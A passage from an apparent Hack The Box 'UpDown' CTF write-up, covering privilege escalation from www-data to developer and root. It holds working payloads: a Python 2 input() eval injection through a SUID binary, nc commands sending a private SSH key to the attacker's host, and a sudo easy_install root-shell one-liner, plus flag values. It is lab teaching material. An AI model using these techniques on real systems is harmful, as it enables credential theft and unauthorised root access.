drwxr-xr-x 19 root root 4096 Aug 3 2022 ..
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 developer
www-data@updown:/var/www/dev$ ls -la /home/developer
ls -la /home/developer
total 40
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 .
drwxr-xr-x 3 root root 4096 Jun 22 2022 ..
lrwxrwxrwx 1 root root 9 Jul 27 2022 .bash_history -> /dev/null
-rw-r--r-- 1 developer developer 231 Jun 22 2022 .bash_logout
-rw-r--r-- 1 developer developer 3771 Feb 25 2020 .bashrc
drwx------ 2 developer developer 4096 Aug 30 2022 .cache
drwxrwxr-x 3 developer developer 4096 Aug 1 2022 .local
-rw-r--r-- 1 developer developer 807 Feb 25 2020 .profile
drwx------ 2 developer developer 4096 Aug 2 2022 .ssh
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 dev
-rw-r----- 1 root developer 33 Apr 28 06:05 user.txt
www-data@updown:/var/www/dev$ cat /home/developer/user.txt
cat /home/developer/user.txt
cat: /home/developer/user.txt: Permission denied
www-data@updown:/var/www/dev$

15. Enumeration shows /home/developer/dev, group-owned by www-data, containing a SUID binary siteisup (owned by developer) and a script siteisup_test.py. Pull both back with nc for analysis:

www-data@updown:/var/www/html/dev$ cd /home/developer/dev
cd /home/developer/dev
www-data@updown:/home/developer/dev$ ls -la
ls -la
total 32
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 .
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 ..
-rwsr-x--- 1 developer www-data 16928 Jun 22 2022 siteisup
-rwxr-x--- 1 developer www-data 154 Jun 22 2022 siteisup_test.py
www-data@updown:/home/developer/dev$

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 > siteisup
listening on [any] 80 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 36696
^C

www-data@updown:/home/developer/dev$ nc -v 10.10.14.39 80 < ./siteisup
nc -v 10.10.14.39 80 < ./siteisup
Connection to 10.10.14.39 80 port [tcp/http] succeeded!

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 > siteisup_test.py
listening on [any] 80 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 36698
^C
www-data@updown:/home/developer/dev$ nc -v 10.10.14.39 80 < ./siteisup_test.py
Connection to 10.10.14.39 80 port [tcp/http] succeeded!
www-data@updown:/home/developer/dev$

16. Analyse the downloaded files:

┌──(kali㉿offsec)-[~/Desktop]
└─$ file siteisup_test.py
siteisup_test.py: ASCII text

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat siteisup_test.py
import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
print "Website is up"
else:
print "Website is down"

┌──(kali㉿offsec)-[~/Desktop]
└─$ file siteisup
siteisup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b5bbc1de286529f5291b48db8202eefbafc92c1f, for GNU/Linux 3.2.0, not stripped

┌──(kali㉿offsec)-[~/Desktop]
└─$ strings siteisup
/lib64/ld-linux-x86-64.so.2
libc.so.6
puts
setresgid
setresuid
system
getegid
geteuid
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Welcome to 'siteisup.htb' application
/usr/bin/python /home/developer/dev/siteisup_test.py
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
siteisup.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
setresuid@@GLIBC_2.2.5
_edata
setresgid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
getegid@@GLIBC_2.2.5
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

17. The strings show that the binary calls setresuid/setresgid and then system("/usr/bin/python /home/developer/dev/siteisup_test.py"). The script is Python 2 (print statements), and Python 2's input() evaluates the typed line as a Python expression, so the "Enter URL here:" prompt is an eval sink that runs as developer. Payloads:

__import__('os').system('id')

__import__('os').system('bash')
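To make the sink concrete, an added Python 3 example (not code from the writeup or from the box) that reproduces Python 2's input() semantics with eval(), next to a hardened prompt that treats the line as text and validates it as an http(s) URL. The payload above and the "Invalid URL '0'" traceback in the next step both follow from it.

```python
from urllib.parse import urlparse

# siteisup (SUID developer) runs: /usr/bin/python /home/developer/dev/siteisup_test.py
# The script is Python 2 (print statements). In Python 2, input() is eval(raw_input()):
# whatever is typed at "Enter URL here:" is evaluated as a Python expression as developer.


def py2_input(line):
    """Python 2 input() semantics, reproduced deliberately to show the sink."""
    return eval(line)  # intentionally vulnerable: evaluates attacker-supplied text


def vulnerable_prompt(line):
    """What siteisup_test.py effectively does with the typed line before requests.get(url)."""
    url = py2_input(line)
    # With the payload __import__('os').system('id'), system() runs the command and
    # returns its exit status 0, so requests.get(0) is what raised "Invalid URL '0'".
    # With system('bash') the script blocks in that shell until it exits.
    return url


def safe_prompt(line):
    """Hardened version: treat the line as text (Python 3 input / Python 2 raw_input)
    and accept only http(s) URLs with a host; anything else is rejected, never evaluated."""
    text = line.strip()
    parts = urlparse(text)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("Invalid URL: expected http(s)://host[/path]")
    return text


def rejected(line):
    """True when safe_prompt() refuses the line (used to check the hardened path)."""
    try:
        safe_prompt(line)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_prompt("'http://siteisup.htb'"))        # a quoted string is the only "safe" input
    print(vulnerable_prompt("__import__('os').getcwd()"))    # arbitrary expression, evaluated
    print(safe_prompt("http://siteisup.htb"))
    print(rejected("__import__('os').system('id')"))         # True: rejected, not executed
```

The SUID wrapper makes a Python 2 foot-gun into a privilege boundary crossing; the fix is raw_input()/Python 3 plus URL validation, and not shipping a SUID binary that shells out to an interpreter at all.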

18. Try it from the www-data shell. The id command runs as uid 1002(developer); the exit status 0 of os.system() then becomes the "URL" handed to requests.get(), which produces the MissingSchema traceback about '0':

www-data@updown:/home/developer/dev$ ./siteisup
./siteisup
__import__('os').system('id')
uid=1002(developer) gid=33(www-data) groups=33(www-data)
Enter URL here:Traceback (most recent call last):
File "/home/developer/dev/siteisup_test.py", line 4, in <module>
page = requests.get(url)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 515, in request
prep = self.prepare_request(req)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 453, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 318, in prepare
self.prepare_url(url, params)
File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 392, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL '0': No scheme supplied. Perhaps you meant http://0?
Welcome to 'siteisup.htb' application

www-data@updown:/home/developer/dev$

19. It is exploitable. Spawn bash through the same sink, then upgrade it to a pty:

www-data@updown:/home/developer/dev$ ./siteisup
./siteisup
__import__('os').system('bash')

id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
developer@updown:/home/developer/dev$ id
id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
developer@updown:/home/developer/dev$

20. That is a shell as developer, but only the uid was switched: the SUID binary sets its uid to the effective uid (developer) while the gid stays 33(www-data), which is why user.txt (root:developer, mode 0640) is still unreadable here. For a proper session with the user's real groups, copy the SSH private key from ~/.ssh (readable now that we run as developer) and log in over SSH:

developer@updown:/home/developer/dev$ cd ../
cd ../
developer@updown:/home/developer$ ls -la
ls -la
total 40
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 .
drwxr-xr-x 3 root root 4096 Jun 22 2022 ..
lrwxrwxrwx 1 root root 9 Jul 27 2022 .bash_history -> /dev/null
-rw-r--r-- 1 developer developer 231 Jun 22 2022 .bash_logout
-rw-r--r-- 1 developer developer 3771 Feb 25 2020 .bashrc
drwx------ 2 developer developer 4096 Aug 30 2022 .cache
drwxrwxr-x 3 developer developer 4096 Aug 1 2022 .local
-rw-r--r-- 1 developer developer 807 Feb 25 2020 .profile
drwx------ 2 developer developer 4096 Aug 2 2022 .ssh
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 dev
-rw-r----- 1 root developer 33 Apr 28 06:05 user.txt
developer@updown:/home/developer$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
developer@updown:/home/developer$ cd .ssh
cd .ssh
developer@updown:/home/developer/.ssh$ ls -la
ls -la
total 20
drwx------ 2 developer developer 4096 Aug 2 2022 .
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 ..
-rw-rw-r-- 1 developer developer 572 Aug 2 2022 authorized_keys
-rw------- 1 developer developer 2602 Aug 2 2022 id_rsa
-rw-r--r-- 1 developer developer 572 Aug 2 2022 id_rsa.pub
developer@updown:/home/developer/.ssh$

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 > id_rsa
listening on [any] 80 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 36702
^C

developer@updown:/home/developer/.ssh$ nc -v 10.10.14.39 80 < ./id_rsa
nc -v 10.10.14.39 80 < ./id_rsa
Connection to 10.10.14.39 80 port [tcp/http] succeeded!
developer@updown:/home/developer/.ssh$


┌──(kali㉿offsec)-[~/Desktop]
└─$ chmod 600 id_rsa

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh developer@10.10.11.177 -i id_rsa
The authenticity of host '10.10.11.177 (10.10.11.177)' can't be established.
ED25519 key fingerprint is SHA256:c0DzrPfIOA6IA7zGJh7Ee/FJ3B2g7R2KnzeUif9zCWQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.177' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Apr 28 07:16:45 UTC 2024

System load: 0.0
Usage of /: 49.9% of 2.84GB
Memory usage: 16%
Swap usage: 0%
Processes: 230
Users logged in: 0
IPv4 address for eth0: 10.10.11.177
IPv6 address for eth0: dead:beef::250:56ff:feb9:5e17


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug 30 11:24:44 2022 from 10.10.14.36
developer@updown:~$ id
uid=1002(developer) gid=1002(developer) groups=1002(developer)
developer@updown:~$

21. Grab the user flag:

developer@updown:~$ hostname
updown
developer@updown:~$ cat user.txt
fb982b76b8259718822b80af37be9ad7
developer@updown:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.177 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:5e17 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:5e17 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:5e:17 txqueuelen 1000 (Ethernet)
RX packets 4074 bytes 385354 (385.3 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 667 bytes 206816 (206.8 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 40 bytes 3608 (3.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 40 bytes 3608 (3.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

developer@updown:~$

0x02 Getting root

22. Continue enumerating:

developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_install
developer@updown:~$ ls -la /usr/local/bin/easy_install
-rwxr-xr-x 1 root root 229 Aug 1 2022 /usr/local/bin/easy_install
developer@updown:~$ cat /usr/local/bin/easy_install
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
developer@updown:~$

23. easy_install is a (now deprecated) way of installing Python packages. At its core it runs the package's setup.py, which is trusted to carry out the installation steps. Since easy_install effectively executes an arbitrary Python script, and sudo runs it as root without a password, getting code execution from it is trivial. GTFOBins has a copy-paste snippet for a shell, but I will walk through it myself to understand it better.

https://gtfobins.github.io/gtfobins/easy_install/

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF

24. Run it and read the flag. setup.py is executed by root while the egg is being built, and the $(tty) redirections (expanded by the developer shell when setup.py is written) attach the root sh to the current terminal:

developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$
developer@updown:~$ sudo easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.2Twcv6BdHr
Writing /tmp/tmp.2Twcv6BdHr/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.2Twcv6BdHr/egg-dist-tmp-py4Npp
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty; pty.spawn("/bin/bash")'
root@updown:/tmp/tmp.2Twcv6BdHr#
root@updown:/tmp/tmp.2Twcv6BdHr# cd ~
root@updown:~# ls -la
total 44
drwx------ 6 root root 4096 Apr 28 06:05 .
drwxr-xr-x 19 root root 4096 Aug 3 2022 ..
lrwxrwxrwx 1 root root 9 Jul 27 2022 .bash_history -> /dev/null
-rw-r--r-- 1 root root 11 Jun 22 2022 .bash_logout
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4096 Jun 22 2022 .cache
drwxr-xr-x 3 root root 4096 Jul 27 2022 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 66 Aug 1 2022 .selected_editor
drwx------ 2 root root 4096 Jun 22 2022 .ssh
-rw-r----- 1 root root 33 Apr 28 06:05 root.txt
drwx------ 3 root root 4096 Jun 22 2022 snap
root@updown:~# cat root.txt
7aed504e303e2a960abdcbae6426559d
root@updown:~#

0x03 Completion badge

https://www.hackthebox.com/achievement/machine/1705469/493


UpDown-htb-writeup
https://sh1yan.top/2024/04/28/UpDown-htb-writeup/
Author: shiyan
Published: 28 April 2024
License